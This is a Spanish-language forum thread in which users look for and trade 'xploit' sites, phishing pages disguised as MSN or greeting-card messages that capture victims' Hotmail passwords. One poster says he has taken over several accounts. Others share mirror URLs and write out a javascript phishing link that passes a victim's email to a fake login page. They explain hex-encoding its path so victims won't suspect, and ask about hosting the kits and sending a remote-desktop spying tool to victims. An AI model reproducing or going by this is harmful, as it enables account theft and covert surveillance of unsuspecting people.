Anuncio

Anuncio Módulo
Colapsar
No hay anuncio todavía.

Pagina para enviar Xploits

Título de Página Módulo
Transferir Eliminar Colapsar
X
Detalle Conversación Módulo
Colapsar
  • Filtrar
  • Tiempo
  • Mostrar
Limpiar Todo
nuevos mensajes

• Pagina para enviar Xploits

Hasta hace poco yo entraba a http://www.ontargetpage.tk/ mandaba exploits desde ahi como paginas de gusanito, para bajar el msn 8, o mensajes libres y depues recuperaba la contraseña en una base de datos de la pagina. La verdad q era muuuy buena esa pagina pero creo q no funciona mas o han cambiado la direccion.

Me podrian decir que paso?? La estaran actualizando o la cerraron y si conocen alguna pagina q mande los xploits directamente sin tener que cortar ni pegar los codigos se los agradeceria.

Gracias por su tiempo.
    Pablo

si, es cierto ke estaba buena la pagina... al parecer la cerraron. pero busca en google ke vas a encontar muchas, talvez no te las dejen tan servidas como los "exploits" de ontargetpage pero si usas un poco la imaginacion y recurris a la creatividad te la vas a arreglar mas ke bien.
    Saludos

Comentario

Ontargetpage.tk va por la version 5.0 de su web,
      y en estos momentos no está disponible ni funcional.

Una de dos:

- Estan actualizando de nuevo
      - Han cerrado la web (Altamente probable)

Son los motivos por los que puede que no funcione.
      Como dice t4t0, busca en google que nuestro querido buscador
      encontrará muchisimas paginas similares,
      aunque puede que ninguna con la misma efectividad.

Una vez más, saludos.

Comentario

Hace poco la habian actalizado... no creo ke tan rapido lo vuelvan a hacer, aunke espero ke si...
        De todas formas, esos "exploits" solo tratan sobre ingenieria social... no son en verdad exploits.
        Si se usa un poco la imaginacion se pueden logar los mismos resultados.
        Saludos

Comentario

Bueno pablitocopado, anda a esta pagina:
          http://msn.webcindario.com/ontargetpage/
          es la de ontarget planet, la misma.
          Saludos y ke la disfrutes

PD: aparentemente los lanzadores no están cargados a la web... supongo ke habra ke esperar.

Comentario

Gracias por la información t4t0.

Voy a echarle un vistazo ahora mismo.
            Saludos.

Comentario

Ahora si anda !!!

Gracias por la ayuda t4t0.

Un abrazo.

Comentario

De nada... para eso estamos
                Cuando encuentre otra página similar la posteo ok?
                Saludos comu

Comentario

Hola pablitocopado,
                  Siento ser aguafiestas pero esa es la versión antigua de la pagina,
                  quiero decir, yo mismo he probado el exploit (varios) enviandomelos...
                  Pero ninguno ha funcionado...¿Porqué no?.

Muy sencillo, paso a explicartelo:

Cada exploit de ontargetpage.tk tiene un link que incita a visitar nosequecosa una vez recibido. Bien, el enlace es algo así:

Código:
                  javascript:dl('http://passportnet.50webs.com/%6D%73%6E%67%72%6F%75%70/login.htm?login=emailvictima@hotmail.com&sexo=elkesea',1);
                  Dentro de eso, hay un codigo malicioso que captura la contraseña y la guarda en la BD (Base de datos).
                  La cadena de esa URL que lleva:
                  %6D%73%6E%67%72%6F%75%70
                  es un directorio, el del exploit usado, este en concreto significa:
                  %6D%73%6E%67%72%6F%75%70 = msngroup
                  Podeis comprobarlo comparando codigos HEX con esa cadena guiados por la siguiente web:
                  http://www.ascii.cl/es/
                  entonces se pone así en codigo hex para que la victima no sospeche.

Si ejecutais la dirección os lleva a una pagina de error, por lo tanto, NO FUNCIONA.

Esto es todo, hasta que no actualizen o lo arreglen no hay nada.
                  Saludos.

Comentario

Entiendo bien

Bueno evidentemente habra q esperar, nada mas era muy comoda y eficaz, con esa paguna saque varias cuentas. En fin ahora tendre que ponerme a trabajar con los codigos y esas cosas, no soy nada bueno en eso pero no me queda otra.

Saludos

Comentario

Trankilo ke así se aprende... ante cualkier duda pregunta.
                      Saludos

Comentario

Como dice t4t0, pregunta y te ayudamos,
                        yo se bastante de html y algo de php (poco)
                        y bueno podrias conseguir algo eficaz .

Sobre todo imaginación, o no t4t0? xDDDDDDDD

Saludos.

Comentario

:S

Comentario

Que tal soy nuevo en este pero http://msn.webcindario.com/ontargetpage/ en esa pag que dio vienen muchos xploits y abajo dice que no sirven, me podrian decir si alguno sirve por que prove el de msgr 8 beta y de gusanito.com y no los mando.Otra cosa si no es mucha molestia en esa misma pag en la parte de espionaje viene el programa de Remote DeskTop pero como lo uso o como lo activo o se lo envio,no explica nada. por favor ayudenme

Comentario

Hola. Soy nuevo en este foro y he andado buscando exploits, y ahora me encuentro que ya no sirven. Entonces, como sirven??? Dicen que los suba a un host. Pero , no se nada de programacion en WEB. Alguien sabe a que host se pueden subir???
                              Despues la cosa es que tu victima llegue a ese host no??? Eso creo que con enviarle el link, no creen?

Comentario

Trabajando...
                              X